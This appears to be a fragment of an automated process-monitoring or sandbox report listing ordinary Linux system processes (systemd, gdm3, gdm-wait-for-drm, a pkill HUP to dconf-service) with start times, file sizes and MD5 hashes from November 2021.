                                Arguments:pkill --signal HUP --uid gdm dconf-service
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:11:20
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:20
                                Start date:11/11/2021
                                Path:/usr/lib/gdm3/gdm-wait-for-drm
                                Arguments:/usr/lib/gdm3/gdm-wait-for-drm
                                File size:14640 bytes
                                MD5 hash:82043ba752c6930b4e6aaea2f7747545

                                General

                                Start time:03:11:30
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:30
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:/usr/sbin/gdm3
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f